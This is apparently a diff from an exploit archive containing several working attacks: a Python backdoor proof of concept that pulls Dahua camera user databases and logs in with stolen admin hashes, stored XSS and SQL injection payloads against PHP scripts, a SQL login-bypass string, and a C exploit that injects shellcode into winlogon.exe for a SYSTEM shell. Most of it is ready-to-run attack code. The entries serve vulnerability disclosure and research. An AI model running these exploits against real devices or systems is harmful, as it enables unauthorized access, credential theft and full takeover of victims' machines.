With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.
With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.
However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.
NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
[STX]
I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.
I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)
In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!
This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices
This is like a damn Hollywood hack, click on one button and you are in...
Below PoC you will find here: https://github.com/mcw0/PoC/dahua-backdoor.py
Update:
Dahua has requested me to temporally remove the PoC code, will be back here again 5th April. (30 days)
/Sorry, bashis
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.
Have a nice day
/bashis
$ ./dahua-backdoor.py --rhost 192.168.5.2
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
[>] Logging out
[<] 200 OK
[*] All done...
$
$ ./dahua-backdoor.py --rhost 192.168.5.3
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
[>] Logging out
[<] 200 OK
[*] All done...
$
[ETX]
'''
#
# Dahua backdoor PoC Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
# Credentials: No Credentials needed (Exploited as Anonymous)
# Note: PoC intentionally missing essential details to be direct usable for anything else than login/logout.
#
# Vendor URL: http://www.dahuasecurity.com/
#
# Patched firmware can be downloaded from newly introduced 'Firmware download function'
# (Don't mind the old date stamps, these should all be the hotfixed updates)
# http://www.dahuasecurity.com/download_111.html
#
#
# -[ Facts ]-
#
# 1) Requirements
# 1.1) You need to know what you want to request
# 1.2) You need to know how to request what you want
# - When you know this, remote device will give you what you want, without any complains
# 1.3) You need to know how to process the results of your requests
# 1.4) You need to know how to send your processed results back to remote device
# - When you know this, you will be granted full access to remote device, without any complains
#
# 2) Direct file access
# 2.1) /mnt/mtd/Config/{passwd|Account1} downloadable with /current_config/{passwd|Account1} by HTTP/HTTPS
# 2.2) User database hash in format: <username>:<realm>:<password>
# 2.3) /mnt/mtd are read/writable - so sensitive files could (must!) be somewhere else, protected, and not remotely accessible.
# 2.4) /mnt/mtd/Config contains also of intentionally public accessible files (WebCapConfig and preLanguage)
# 2.5) There is several other files that should (must!) not be remotely accessible either (Config1 for example)
#
# 3) Passing the hash
# 3.1) Generation 1 - Base64 encoded (Not in this PoC, since I don't know what I want to request, but I could guess same format as 2.2)
# 3.2) Generation 2 - No processing needed; only to pass on the hash
# 3.3) Generation 3 - New 'improved' MD5 random hash must be generated with additional details, that we simply requesting from remote
# 3.4) New MD5 random hash has to be generated as: <username>:<random>:[MD5 format as in user database (2.2)]
#
# - Not less than three times, Dahua have been poking around in the file structure and in the relevant functions of the source code
# - Changed file names, structure of user database, added/removed both public and sensitive files.
# - And never once wondered;
# 1. 'Hm, why I'm allowed to access these newly added files without login request?'
# 2. 'Hm, I know that file is the user database, can I access that one too without login request?'
# 3. 'Hm, I know that file is the device config, can I access that one too without login request?'
# - Really? Are you kidding me?
#
# When you know all above, and have full access to remote device, the whole thing looks so easy, actually way too easy to be true.
#
#
# -[ Most importantly ]-
#
# 1) Undocumented direct access to certain file structures, and used from some of Dahuas own .js to load 'WebCapConfig' and 'preLanguage'
# 2) Direct and indirect re-usage of hashes possible, however with MD5 hash 'security improvements' in Generation 3
# 3) Essential needs for successful login we simply request from remote device and process, no need to guess nor bruteforce anything
# 4) Abnormally wide range of products and firmware versions that share same reliable attack method, to be 'just an vulnerability'
# - True vulnerability over a wide range products and firmware versions have always some unexpected anomalies, which is expected
# 5) Dahua has lots of debug code compiled into the Firmware that may/normally listening on TCP/6789, although protected by l/p authorization
# - Dahua has been kindly asked to remove all debug code from production firmware, as this access and code do not belong in end user devices
# 6) The admin account '888888' is claimed by Dahua to be limited for local login with 'monitor and mouse' only, and not from remote
# - However, that validation is done locally in users browser by 'loginEx.js', and has therefore no practical effect
# 7) The 'hotfix' remediation was done by hardcoding from full access to two intentionally public accessible files (WebCapConfig and preLanguage)
#
#
# -[ Did Dahua confirm the backdoor by mistake? ]-
#
# Don't know if you noticed that the 'new' patches that was pushed out days after my initital post at IPVM,
# they had different old date stamps, and same old date stamps (as on the archives) was on all inside binaries as well.
#
# Screenshots
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
#
# URL
# http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
# https://dahuawiki.com/images/Firmware/DVR/Q2.2017/
#
# And, bit interesting, Dahua continued to use old date stamps on newly generated firmware updates/hotfixes
#
# -[ Method of discovery ]-
#
# Researching by dissasembling of Dahuas main binaries 'Challenge' / 'Sonia'
# What got me curios, was abnormally empty inside of the image I was initally checking, and of course the big binary 'Challenge'
# What got me on track, was the lack of references to sensitive files
# Missing user database and Config in the archives, only a unused and read-only /etc/passwd was found
# Noticed that sensitive files was generated by the binary at startup
# Noticed checkings after sensitive files in different directories, to use 'defaults' as last resource
# Noticed the mix of intentionally public files and sensitive files in same directory
# Reading of the .htm and .js that was found in the image
# ...etc.
#
#
# -[ My Full Disclosure Policy ]-
#
# Normal vulnerabilites: I collect enough information about my findings and trying to notify the vendor to have coordinated disclosure
# Backdoors: If/when they are intended, the vendors wants to hide/keep them (of course), what would you suggest? Notify the vendor or Full Disclosure?
# Proof of claim: Screenshots or some Youtube video would not proof anything, so the claim couldn't be posted without real hard cold facts
# - Professionals within the CCTV industry needed to know, and the only place I knew were many of them, was at IPVM, and therefore the first post was made there.
#
#
# -[ Next Generation Backdoors ]-
#
# That is in my opinion vendors P2P Cloud solutions.
#
# With P2P, these kind of backdoor implementations as shown in this PoC will then not be needed,
# since with P2P you practically giving away your credentials and addresses to your devices!
# And the connection to P2P, your devices initiates and keeps open. (For me, it is similar to reverse shell)
#
#
# -[ Hat's ]-
#
# I don't wear hats, I wear caps... (when it's cold)
#
#
# -[ Function of this PoC code ]-
#
# 1) Check and dump the remote user database (Generation 2 or 3)
# 2) Find first availible admin user and extract their login/pwd hash
# 3) Request session ID, compute new hash if needed (Generation 3)
# 4) Login and logout to/from remote device
#
#
# -[ Credits ]-
#
# binwalk (https://github.com/devttys0/binwalk)
# - Nothing easy could been done without binwalk, awesome tool. Thanks!
#
# IPVM (https://ipvm.com/)
# - For pickup of the claim and to make PoC report, so this Python PoC could be taken down.
#
# Full Disclosure (http://seclists.org/fulldisclosure/)
# - For existing, without your e-mail list, sensitive stuff would be quite difficult to uncover.
# - Fyodor, thanks again.
#
# And, big thanks to all authors for all other stuff and tools that's needed to successfully execute research within binaries
# - To many for naming.
#
# Have a nice day
# /bashis
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
def Send(self, uri, query_headers, query_data,ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.query_data:
request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
response = urllib2.urlopen(request)
# print response
if response:
print "[<] {} OK".format(response.code)
if self.Raw:
return response
else:
html = response.read()
return html
class Dahua_Backdoor:
def __init__(self, rhost, proto, verbose, creds, Raw):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
#
# Generation 2
#
def Gen2(self,response,headers):
self.response = response
self.headers = headers
html = self.response.readlines()
if self.verbose:
for lines in html:
print "{}".format(lines)
#
# Check for first availible admin user
#
for line in html:
if line[0] == "#" or line[0] == "\n":
continue
line = line.split(':')[0:25]
if line[3] == '1': # Check if user is in admin group
USER_NAME = line[1] # Save login name
PWDDB_HASH = line[2]# Save hash
print "[i] Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
break
#
# Login 1
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Login 2
#
print "[>] Logging in"
query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":PWDDB_HASH,
"clientType":"Web3.0",
"authorityType":"OldDigest"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()
#
# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
#
#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response
#
# Generation 3
#
def Gen3(self,response,headers):
self.response = response
self.headers = headers
json_obj = commentjson.load(self.response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Check for first availible admin user
#
for who in json_obj[json_obj.keys()[0]]:
if who['Group'] == 'admin': # Check if user is in admin group
USER_NAME = who['Name'] # Save login name
PWDDB_HASH = who['Password'] # Save hash
print "[i] Choosing Admin Login: {}".format(who['Name'])
break
#
# Request login
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Generate login MD5 hash with all required info we have downloaded
#
RANDOM = json_obj['params']['random']
PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + ''
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
print "[i] Downloaded MD5 hash:",PWDDB_HASH
print "[i] Random value to encrypt with:",RANDOM
print "[i] Built password:",PASS
print "[i] MD5 generated password:",RANDOM_HASH
#
# Login
#
print "[>] Logging in"
query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":RANDOM_HASH,
"clientType":"Web3.0",
"authorityType":"Default"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()
# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
#
#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
raw_request = True
rhost = '192.168.5.2' # Default Remote HOST
rport = '80' # Default Remote PORT
creds = False # creds = 'user:pass'
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
rhost = rhost + ':' + rport
headers = {
'X-Requested-With' : 'XMLHttpRequest',
'X-Request' : 'JSON',
'User-Agent':'Dahua/2.0; Dahua/3.0'
}
#
# Try to find /current_config/passwd user database (Generation 2)
#
try:
print "[>] Checking for backdoor version"
URI = "/current_config/passwd"
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 2 found"
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen2(response,headers)
except urllib2.HTTPError as e:
#
# If not, try to find /current_config/Account1 user database (Generation 3)
#
if e.code == 404:
try:
URI = '/current_config/Account1'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 3 Found"
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen3(response,headers)
except urllib2.HTTPError as e:
if e.code == 404:
print "[!] Patched or not Dahua device! ({})".format(e.code)
sys.exit(1)
else:
print "Error Code: {}".format(e.code)
except Exception as e:
print "[!] Detect of target failed ({})".format(e)
sys.exit(1)
print "\n[*] All done...\n"
sys.exit(0)

19
exploits/php/webapps/43988.txt Normal file
View file

@ -0,0 +1,19 @@
######################################################################################
# Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS.
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
# Category: Web Application
# Version: 1.0.2
# Tested on: Linux Mint
# CVE: CVE-2018-6655
#######################################################################################
*Proof of Concept*
1. Login as a user
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"

20
exploits/php/webapps/43989.txt Normal file
View file

@ -0,0 +1,20 @@
######################################################################################
# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
# Category: Web Application
# Version: =>3.0
# Tested on: Linux Mint
# CVE: NA
#######################################################################################
Proof of Concept
=================
1. Login as a user
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"

20
exploits/php/webapps/43990.txt Normal file
View file

@ -0,0 +1,20 @@
######################################################################################
# Exploit Title: Naukri Clone Script - Stored XSS
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
# Category: Web Application
# Version: 3.0.3
# Tested on: Linux Mint
# CVE: na
#######################################################################################
Proof of Concept
=================
1. Login as a jobseeker
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"

20
exploits/php/webapps/43991.txt Normal file
View file

@ -0,0 +1,20 @@
######################################################################################
# Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
# Category: Web Application
# Version: 3.1
# Tested on: Linux Mint
# CVE: na
#######################################################################################
Proof of Concept
=================
1. Login to Hot Scripts Clone : Script Classified
2. Select Any Ads
3. Goto below review section and put "<script>alert("PKP")</script>" as
title or description
4. You will have popup of "PKP"

27
exploits/php/webapps/43994.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
# Version: 2.0.7
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :
SQLi:
# server/login.php?normal&cid=[SQL]
# Parameter : cid (GET)
# Type: UNION QUERY
# Title: Generic UNION query (NULL) - 5 columns
# payload : /*!00000UNION*/ ALL SELECT
NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL
/*!00000from*/ information_schema.columns where table_schema=schema()%23
Test :
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23

22
exploits/php/webapps/43995.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any authentication.
# # # # #
# Proof of Concept :
# 1) First go to login page .
# 2) Username : anything , Password : ' or 'x'='x
PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html
Test : http://server/login.php?lerr

205
exploits/windows/local/43987.c Normal file
View file

@ -0,0 +1,205 @@
/*
Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date: 03/02/2018
Author: Souhail Hammou
Vendor Homepage: https://www.malwarefox.com/
Version: 2.74.0.150
Tested on: Windows 7 32-bit / Windows 10 64-bit
CVE: CVE-2018-6606
*/
#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
BOOL RegisterProcessByIOCTL(HANDLE hDevice)
{
DWORD pid, BytesReturned;
/*
IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
processes can send special IOCTLs to the driver to do stuff like:
- Enable/Disable real-time protection
- Write to raw disk
- Open full access handles to processes
- ...etc
When a process sends a special IOCTL, the driver checks if that process is registered (as
shown in the disassembly below at address 0000000140010573).
However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
doesn't check to see if the requestor itself is registered (0000000140010553).
That way, any process can register any other process (including itself) with the driver.
.text:000000014001054A mov ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
.text:000000014001054D cmp ebx, 80002010h
.text:0000000140010553 jz short find_ioctl_dispatcher ;jump past the check
[......]
.text:0000000140010573 mov edx, 1
.text:0000000140010578 mov ecx, ebp ; Requestor_PID
.text:000000014001057A call IsProcessRegistered
.text:000000014001057F lea rdx, aMain_c
.text:0000000140010586 test eax, eax
.text:0000000140010588 jnz short loc_1400105C2
.text:000000014001058A mov [rsp+68h+var_38], ebp
.text:000000014001058E lea rax, aProcessidDIsNo
.text:0000000140010595 mov edi, STATUS_ACCESS_DENIED
[......]
.text:00000001400105C8 find_ioctl_dispatcher: ; CODE XREF: sub_1400104BC+97j
.text:00000001400105C8 ; sub_1400104BC+ACj
[......]
.text:0000000140010612 cmp ebx, 80002010h
.text:0000000140010618 jz loc_1400106D7 ; dispatch the IOCTL
*/
pid = GetCurrentProcessId(); //Register our process with the driver
if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
{
return FALSE;
}
return TRUE;
}
DWORD GetWinlogonPID()
{
DWORD WinlogonPid = 0;
PROCESSENTRY32 ProcessEntry;
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
printf("[-] CreateToolhelp32Snapshot failed !\n");
goto ret;
}
if (!Process32First(hSnapshot, &ProcessEntry))
{
printf("[-] Process32First failed !\n");
goto cleanup;
}
do
{
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
{
WinlogonPid = ProcessEntry.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &ProcessEntry));
cleanup:
CloseHandle(hSnapshot);
ret:
return WinlogonPid;
}
int main(int argc, char** argv)
{
DWORD BytesReturned;
DWORD winlogon_pid;
HANDLE winlogon_handle;
LPVOID RemoteAllocation;
HANDLE hDevice;
printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
printf(" Tested on Windows 10 64-bit \n");
printf(" Souhail Hammou \n\n");
printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");
hDevice = CreateFile
("\\\\.\\ZemanaAntiMalware",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
return 0;
}
if (!RegisterProcessByIOCTL(hDevice))
{
printf("\t[-] Registration Failed !\n");
return 0;
}
printf("\t[+] Process registered.\n[*] Stage 2: \n");
printf("\t[+] Getting Winlogon's PID\n");
winlogon_pid = GetWinlogonPID();
if (!winlogon_pid)
{
printf("\t[-] GetWinlogonPID() failed !\n");
return 0;
}
printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
/*
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
We use this IOCTL to open a full access handle to winlogon.exe.
Note that this IOCTL can only be sent if the process is registered with the driver.
*/
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
return 0;
}
printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{
printf("\t[-] VirtualAllocEx failed !\n");
return 0;
}
printf("\t[+] Writing shellcode to allocated memory\n");
/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
{
printf("\t[-] WriteProcessMemory Failed !\n");
return 0;
}
printf("\t[+] Spawning SYSTEM shell\n");
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
{
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
return 0;
}
}

37
